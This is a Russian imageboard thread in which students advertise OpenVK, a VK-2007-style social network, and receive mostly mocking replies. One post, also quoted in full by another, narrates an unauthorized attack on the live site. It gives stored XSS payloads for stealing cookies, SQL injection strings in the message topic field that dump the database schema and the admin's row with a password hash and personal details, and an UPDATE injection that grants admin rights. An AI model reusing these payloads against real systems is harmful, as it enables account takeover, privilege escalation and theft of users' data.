Главная Настройка Mobile Контакты NSFW Каталог Пожертвования Купить пасскод Pics Adult Pics API Архив Реквест доски Каталог стикеров Реклама
Доски


[Ответить в тред] Ответить в тред

Check this out!


[Назад][Обновить тред][Вниз][Каталог] [ Автообновление ] 51 | 6 | 33
Назад Вниз Каталог Обновить

Как мы сделали альтернативу ВК 2007. Medvedev. 22/12/17 Птн 15:38:27  1111032  
image.png (170Кб, 872x910)
image.png (118Кб, 847x761)
image.png (85Кб, 810x607)
Ну короче. Начали мы разработку 8 месяцев назад. Типо учим пыху, все дела. И вот сейчас, уже полноценная соц.сеть (без музыки :с (скоро будет) ). С дизайном 2007, окда.
Многое уже сделано:
- Видео (с ютуба, конечно)
- Группы
- Страницы Юзеров
и многое другое.
А еще мы сделали регистрацию, вот, регистрируйтесь.
Двачуйте =)
а ну ссылка, точно https://openvk.gfx3336007.com
=)
Аноним 22/12/17 Птн 15:41:53  1111036
>>1111032 (OP)
фронт люто не проработан. все едет, шрифты в разных местах разного размера. не соблюдены отступы. говно короче.
Аноним 22/12/17 Птн 15:45:06  1111037
>>1111036
>фронт люто не проработан. все едет, шрифты в разных местах разного размера. не соблюдены отступы. говно короче.
Тебе виднее =)
Аноним 22/12/17 Птн 15:50:39  1111040
>>1111032 (OP)
Вы ебнутые на всю голову нахуй.
Только сделайте стикеры бесплатные пожалуйста.

Хотелось бы помоч, но не вижу гитхаба.
Аноним 22/12/17 Птн 15:52:41  1111042
>>1111040
таки будет выложен код на гитхуб =)
Аноним 22/12/17 Птн 15:54:27  1111044
>>1111042
Ок.
Тогда как верифицировать аккаунт для галочки.
Аноним 22/12/17 Птн 17:15:58  1111097
>>1111044
по ебалу.
мимо другой анон который собрал нейросеть для распознования
Аноним 22/12/17 Птн 17:22:00  1111101
>>1111044
фотку на против пк, где открыта страничка. ебло замазать можешь ;)
Аноним 22/12/17 Птн 18:15:26  1111119
>>1111032 (OP)
И нахуя это тут, смайлоблядь? Иди на пикабу пиарься, хули ты от нас хочешь?
Аноним 22/12/17 Птн 18:20:32  1111121
>>1111111
Аноним 22/12/17 Птн 18:20:46  1111122
>>1111119
Чтобы вы мне отсосали.
Аноним 22/12/17 Птн 18:47:54  1111137
лучше бы аналог двача запилили со свободой
Аноним 22/12/17 Птн 19:18:33  1111149
еще одно сосальное говно высралось
Аноним 23/12/17 Суб 03:05:06  1111317
>>1111032 (OP)

как хорошо когда есть много свободного времени и мамка накормит
Аноним 23/12/17 Суб 06:43:51  1111330
14475879074960.jpg (215Кб, 620x877)
>>1111137
До слёз.
Аноним 23/12/17 Суб 12:08:16  1111386
https://openvk.gfx3336007.com/club63
Группа для тех, кто ищет друзей
Аноним 23/12/17 Суб 12:20:56  1111390
>>1111386
Хотя нет, хуита, не вступайте в мою группу.
Аноним 23/12/17 Суб 13:41:29  1111423
>>1111032 (OP)

Вы бы хоть ссылки сделали одного оттенка синего.
Аноним 23/12/17 Суб 15:35:36  1111465
>>1111137
В сети масса свободных борд, но на них сидит 3.5 анона. Переезжай на любую.
Аноним 23/12/17 Суб 19:30:52  1111540
Screen Shot 201[...].png (387Кб, 1358x1102)
>>1111032 (OP)
>но с открытым исходным кодом (который ещё не опубликован)
>открытым исходным кодом
>который ещё не опубликован
Аноним 24/12/17 Вск 01:29:51  1111631
>>1111032 (OP)

Красавцы, вернули мой 2007 в поооолном размере, спасибо.
А теперь расслабьтесь и представьте, что читаете выпуска Ксакепа за декабрь 2007. Погнали.


Хей, браза!

Популярные нынче социальные сети набирают обороты. Об одной из них я тебе сегодня и поведаю, усаживайся поудобнее.
Одной прекрасной и холодной новосибирской ночью я, потягивая горячий чай, пролистывал посты одного анонимного форума. Внезапно наткнулся на
ссылку на некий ОупенВК. "Хм, интересно!", подумал я и незамедлительно пошел создавать учетку.
Немного смутило "ГНУ ГПЛ, но без сорцов". Ну да ладно, чувакам виднее.

Немного посерфив местных Дуровых (с id1, etc), решил что стоит проверить, как местные пишут этот скрытый от общественности,
но открытый по своей сути, как завещал дедушка Столлман гпл-код.

Стандартные ковычки в GET-атрибутах ничего не давали, кроме стандартных для этой соцсети страниц ошибок, но проверку на массив проходили не
везде, показывая чистый лист, смутно намекая, что код открыто-закрыт не просто так.
Сходу залить шелл картинкой myphoto.jpg.php не получилось, хотя аплоад шел, о чем говорила битая превьюшка фоток. Ну и бес с ними.
Хтмл экранировался в постах и других местах на первый взгляд корректно, тут тоже голяк.
А что с личными сообщениями?

Перейдя в раздел ЛС, успешно отправил сам себе сообщение, подменив select выбора друзей. Запахло интересными вещами.

Немного модифицировал форму для удобства пентестинга, я начал работу. Самым интересным оказалось поле topic, которое моментально
выдало Array в сабже на запрос topic[]=lulz. Вот и лазейка, вывод поля "Тема" в списке сообщений не экранировался, что давало простор для
хранимой XSS. Зарегав вторую учетку, я успешно отправил себе сообщение с интересным пейлоадом: <img onload="console.log(\"pnwd\");" src=https://openvk.gfx3336007.com/avatar.php?image=content/avatars/4548738785.jpg width=0 height=0/>, опять таки подменив uid, и, будучи не в своем списке друзей,
я успешно получил сообщение на втором акке (как вы уже поняли, проверка на друга не выполняется, что укрепляло надежду на получение кук местного Дурова).
console.log(document.cookie); спокойно выдал сессионную куку (ребята явно не слышали про HTTP Only cookies). Состряпав форму на отправку кук самому себе в ЛС, я получил неожиданный облом оттуда, откуда не ждал: поле topic имело совсем короткую длину, что не давало возможности встроить в onload зловредной картинки что-то полезное. Можно было бы состряпать сторонний сниффер, но было совсем лень заморачиваться с HTTPS сертификатом (подопытный работал по HTTPS).

Отложив XSS-хранимку (что уже отличный улов, который давал кучу лулзов, начиная с автоматического разлогинивания при получении сообщения, ибо логаут через ГЕТ, без ЦСРФ-токена, до отправки банальных многомегабайтный img-бомб с красивыми галактиками с сайта НАСА), я вернулся к изучению формы отправки сообщения.

И аллилуя, topic вида Goo',version(),113);/#--%00 прислал мне в сообщения что? Правильно, "10.1.29-MariaDB"! А 113 -- это мой uid в этой социальной сети.
Фильтрации в поле topic нет, перед нами Скуль инжекшн в INSERT-запросе. Теперь началось интересное.

Получив имя базы данных, "gfxcom_main" (как читатель уже наверняка догадался, с помощью волшебной функции database()), я начал изучение information_schema. А что, очень удобно, отправляешь сам себе сообщения, с информацией о кишках социальной сети, разработчики понимают в юзабилити, респект им!

Пейлоад Goo',(SELECT table_name FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 'gfxcom_main' LIMIT 1),113);/
#--%00 вывел `albums`, шикарно,
теперь заюзаем GROUP_CONCAT: SELECT GROUP_CONCAT(`table_name` SEPARATOR ', ') FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 'gfxcom_main' GROUP BY `TABLE_SCHEMA`
в результате получаем список всех табличек соцсети: albums, blacklist, blog, bugtracker, club, clubsub, comments, dialogs, friends, gcomments, geousers, gpost, info_site, messages, news, note, nyash, pcomments, photo, siteinfo, subs, userblog, users, vcomments, video, wall

Вероятно нас больше всего будет интересовать таблица users, получим список колонок:
SELECT GROUP_CONCAT(`COLUMN_NAME` SEPARATOR ', ') FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema = 'gfxcom_main' AND table_name='users' GROUP BY `TABLE_NAME`;. И результат: id, name, surname, groupu, nickname, status, regdate, birthdate, lastonline, avatar, login, password, regip, gender, ban, comment_ban, aboutuser, verify, aboutuser2, cssstyle, closedwall

Хм, интересная колонка groupu. Но посмотрим все, чем богат местный Дуров: SELECT CONCAT_WS('|', id, name, surname, groupu, nickname, status, regdate, birthdate, lastonline, avatar, login, password, regip, gender, ban, comment_ban, aboutuser, verify, aboutuser2, cssstyle, closedwall) FROM `users` WHERE id=1 LIMIT 1

1|Владимир|Иванов|2|[veselcraft]|До нового года 9 дней!|2017-08-10 23:08:15|1087333200|1514064812|content/avatars/9903863635.jpg|veselcraft|72e2d13286511240a30dac8eec660d18||1|0||Главный разработчик OpenVK, живу неподалёку от Москвы. фыр)|5|Главный разработчик OpenVK, Московская обл|1|0

ОК, двоечка, поставим-ка себе: Goo','POPYATCHSYA',113);UPDATE `users` SET groupu=2 WHERE id=113;/*#--%00
Перелогинимся в новом браузере, вдруг у нас новый и проапгрейженный интерфейс. Так и есть, видим интересные ссылочки "Админ-панель", "Пользователи", "Сообщества", "Админ-панель Юзера".
Интересного не очень много, если вы конечно не хотите школьного баловства.

Ну, за сим прощаюсь. Разработчикам прекрасной социальной сети желаю не быть пусичками, думать головой, прежде чем делать руками, учить матчасть. Ну и открывать сорцы, иначе качество социальной сети таким и останется. Чао, браза!
Аноним 24/12/17 Вск 02:24:27  1111635
>>1111631
Ахуенно
Аноним 24/12/17 Вск 03:07:56  1111648
images.jpeg (6Кб, 259x194)
>>1111631
Содомит! Это шедеврально. Анонче, я прослезился
Аноним 24/12/17 Вск 05:27:00  1111660
>>1111631
Шикарно!
Аноним 24/12/17 Вск 05:55:59  1111661
>>1111631
тилибонькнул
Аноним 24/12/17 Вск 07:32:06  1111667
>>1111631
ты охуенен
Аноним 24/12/17 Вск 07:50:18  1111672
Вас засудят за дизайн
Аноним 24/12/17 Вск 07:51:52  1111673
Почему логотип не является ссылкой?
Вы наркоманы?

Вы разрешение получили? Как же закон о сми? Как же ононимность в тырнетах?

По моему вы какие-то террористы
Аноним 24/12/17 Вск 07:53:08  1111674
>>1111673
Пидоран порвался.
Аноним 24/12/17 Вск 07:56:05  1111675
>>1111674
Тогда штопайся
Аноним 24/12/17 Вск 20:25:31  1111901
111111.png (17Кб, 662x296)
>>1111032 (OP)
Так себе пиар
хуема аноним 24/12/17 Вск 20:40:35  1111905
хуйня
Аноним 24/12/17 Вск 20:49:14  1111909
>>1111905
Ну зачем ты так сразу. Ребята вкладываются в опесурц лул, делают что-то полезное
Аноним 24/12/17 Вск 21:23:52  1111920
>>1111631
>Красавцы, вернули мой 2007 в поооолном размере, спасибо.
>А теперь расслабьтесь и представьте, что читаете выпуска Ксакепа за декабрь 2007. Погнали.
>
>
>Хей, браза!
>
>Популярные нынче социальные сети набирают обороты. Об одной из них я тебе сегодня и поведаю, усаживайся поудобнее.
>Одной прекрасной и холодной новосибирской ночью я, потягивая горячий чай, пролистывал посты одного анонимного форума. Внезапно наткнулся на
>ссылку на некий ОупенВК. "Хм, интересно!", подумал я и незамедлительно пошел создавать учетку.
>Немного смутило "ГНУ ГПЛ, но без сорцов". Ну да ладно, чувакам виднее.
>
>Немного посерфив местных Дуровых (с id1, etc), решил что стоит проверить, как местные пишут этот скрытый от общественности,
>но открытый по своей сути, как завещал дедушка Столлман гпл-код.
>
>Стандартные ковычки в GET-атрибутах ничего не давали, кроме стандартных для этой соцсети страниц ошибок, но проверку на массив проходили не
>везде, показывая чистый лист, смутно намекая, что код открыто-закрыт не просто так.
>Сходу залить шелл картинкой myphoto.jpg.php не получилось, хотя аплоад шел, о чем говорила битая превьюшка фоток. Ну и бес с ними.
>Хтмл экранировался в постах и других местах на первый взгляд корректно, тут тоже голяк.
>А что с личными сообщениями?
>
>Перейдя в раздел ЛС, успешно отправил сам себе сообщение, подменив select выбора друзей. Запахло интересными вещами.
>
>Немного модифицировал форму для удобства пентестинга, я начал работу. Самым интересным оказалось поле topic, которое моментально
>выдало Array в сабже на запрос topic[]=lulz. Вот и лазейка, вывод поля "Тема" в списке сообщений не экранировался, что давало простор для
>хранимой XSS. Зарегав вторую учетку, я успешно отправил себе сообщение с интересным пейлоадом: <img onload="console.log(\"pnwd\");" src=https://openvk.gfx3336007.com/avatar.php?image=content/avatars/4548738785.jpg width=0 height=0/>, опять таки подменив uid, и, будучи не в своем списке друзей,
>я успешно получил сообщение на втором акке (как вы уже поняли, проверка на друга не выполняется, что укрепляло надежду на получение кук местного Дурова).
>console.log(document.cookie); спокойно выдал сессионную куку (ребята явно не слышали про HTTP Only cookies). Состряпав форму на отправку кук самому себе в ЛС, я получил неожиданный облом оттуда, откуда не ждал: поле topic имело совсем короткую длину, что не давало возможности встроить в onload зловредной картинки что-то полезное. Можно было бы состряпать сторонний сниффер, но было совсем лень заморачиваться с HTTPS сертификатом (подопытный работал по HTTPS).
>
>Отложив XSS-хранимку (что уже отличный улов, который давал кучу лулзов, начиная с автоматического разлогинивания при получении сообщения, ибо логаут через ГЕТ, без ЦСРФ-токена, до отправки банальных многомегабайтный img-бомб с красивыми галактиками с сайта НАСА), я вернулся к изучению формы отправки сообщения.
>
>И аллилуя, topic вида Goo',version(),113);/#--%00 прислал мне в сообщения что? Правильно, "10.1.29-MariaDB"! А 113 -- это мой uid в этой социальной сети.
>Фильтрации в поле topic нет, перед нами Скуль инжекшн в INSERT-запросе. Теперь началось интересное.
>
>Получив имя базы данных, "gfxcom_main" (как читатель уже наверняка догадался, с помощью волшебной функции database()), я начал изучение information_schema. А что, очень удобно, отправляешь сам себе сообщения, с информацией о кишках социальной сети, разработчики понимают в юзабилити, респект им!
>
>Пейлоад Goo',(SELECT table_name FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 'gfxcom_main' LIMIT 1),113);/#--%00 вывел `albums`, шикарно,
>теперь заюзаем GROUP_CONCAT: SELECT GROUP_CONCAT(`table_name` SEPARATOR ', ') FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 'gfxcom_main' GROUP BY `TABLE_SCHEMA`
>в результате получаем список всех табличек соцсети: albums, blacklist, blog, bugtracker, club, clubsub, comments, dialogs, friends, gcomments, geousers, gpost, info_site, messages, news, note, nyash, pcomments, photo, siteinfo, subs, userblog, users, vcomments, video, wall
>
>Вероятно нас больше всего будет интересовать таблица users, получим список колонок:
>SELECT GROUP_CONCAT(`COLUMN_NAME` SEPARATOR ', ') FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema = 'gfxcom_main' AND table_name='users' GROUP BY `TABLE_NAME`;. И результат: id, name, surname, groupu, nickname, status, regdate, birthdate, lastonline, avatar, login, password, regip, gender, ban, comment_ban, aboutuser, verify, aboutuser2, cssstyle, closedwall
>
>Хм, интересная колонка groupu. Но посмотрим все, чем богат местный Дуров: SELECT CONCAT_WS('|', id, name, surname, groupu, nickname, status, regdate, birthdate, lastonline, avatar, login, password, regip, gender, ban, comment_ban, aboutuser, verify, aboutuser2, cssstyle, closedwall) FROM `users` WHERE id=1 LIMIT 1
>
>1|Владимир|Иванов|2|[veselcraft]|До нового года 9 дней!|2017-08-10 23:08:15|1087333200|1514064812|content/avatars/9903863635.jpg|veselcraft|72e2d13286511240a30dac8eec660d18||1|0||Главный разработчик OpenVK, живу неподалёку от Москвы. фыр)|5|Главный разработчик OpenVK, Московская обл|1|0
>
>ОК, двоечка, поставим-ка себе: Goo','POPYATCHSYA',113);UPDATE `users` SET groupu=2 WHERE id=113;/*#--%00
>Перелогинимся в новом браузере, вдруг у нас новый и проапгрейженный интерфейс. Так и есть, видим интересные ссылочки "Админ-панель", "Пользователи", "Сообщества", "Админ-панель Юзера".
>Интересного не очень много, если вы конечно не хотите школьного баловства.
>
>Ну, за сим прощаюсь. Разработчикам прекрасной социальной сети желаю не быть пусичками, думать головой, прежде чем делать руками, учить матчасть. Ну и открывать сорцы, иначе качество социальной сети таким и останется. Чао, браза!

О, великий анон, дай свои данные или же напиши на ВБросе (vk.com/openvk.onion).
Или же openvk.gfx3336007.com/id6
p.s спасибо за нахождения уязвимости =)
==
Дваchую.
Аноним 24/12/17 Вск 21:30:04  1111922
>>1111631
ебитес
https://openvk.gfx3336007.com/post516
Аноним 24/12/17 Вск 22:22:08  1111935
>>1111032 (OP)
но зачем, если есть eggl и friendica?
Аноним 24/12/17 Вск 22:23:18  1111936
>>1111935
Учимся писать онли php + js.
Аноним 24/12/17 Вск 22:31:39  1111940
>>1111936
так эти 2 проекта как раз на пыхе.
Аноним 25/12/17 Пнд 00:35:28  1111996
>>1111940
Учатся они, чего тебе непонятно?
Аноним 25/12/17 Пнд 00:50:31  1112003
>>1111936
Я надеюсь вы все на реакте делали?
Аноним 25/12/17 Пнд 01:24:55  1112011
>>1111901
еб твою мать, 13 летнее вонючее омего. и сколько таких в програмаче и на двоще вообще?
Аноним 25/12/17 Пнд 01:25:29  1112013
тьфу блять, ливаю из этого раковника с детьми
Аноним 25/12/17 Пнд 01:25:48  1112014
>>1111631
УДАЛИ БЫМТРО ИНАЧЕ ПО ИП ВЫЧИСЛЬЮ ТЫ МЕНЯ НЕДОЦЕНИЛ ПИЗДА ТЕБЕ
Аноним 25/12/17 Пнд 16:01:52  1112183
>>1112011
Все.
Аноним 25/12/17 Пнд 22:07:50  1112369
>>1111920
=))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
Аноним 25/12/17 Пнд 22:18:41  1112380
>>1112011
> 13 летнее вонючее омего

это у него хоть контуктер есть, вот у меня в 90х когда 13 лет было, то кроме бейсика и zx spectrum ничего не было, а сейчас школота хуярит соцсети ебать пиздец
Аноним 25/12/17 Пнд 22:30:50  1112391
>>1111032 (OP)
у вас там кажется счетчик пользователей обнулился
Аноним 25/12/17 Пнд 23:18:31  1112412
>>1112380
>соцсети
такую парашу любая обезьяна нахуярит
Аноним 26/12/17 Втр 00:27:41  1112438
>>1112412
Я тебе сейчас за щёку нахуярю, чёрт дырявый.
Аноним 26/12/17 Втр 01:32:05  1112458
>>1112438
смузи или что там у тебя на губах, вначале вытри
Аноним 29/12/17 Птн 04:06:41  1113690
>>1112011
По моему так молодец, изучает программирование и хоть чем-то полезным занимается. Тем более работодатели любят людей, которые могут что-то реальное сделать и показать, а не рассуждать о преобразованиях монад с умным видом.
Аноним 29/12/17 Птн 04:12:47  1113692
>>1112011
А насчет уязвимостей, не знаю, можно ли тут рекомендовать уроки по защите от SQL-инъекций, XSS и CSRF? Прорекламирую, пожалуй: https://github.com/codedokode/pasta/tree/master/security

[Назад][Обновить тред][Вверх][Каталог] [Реквест разбана] [Подписаться на тред] [ ] 51 | 6 | 33
Назад Вверх Каталог Обновить

Топ тредов
Избранное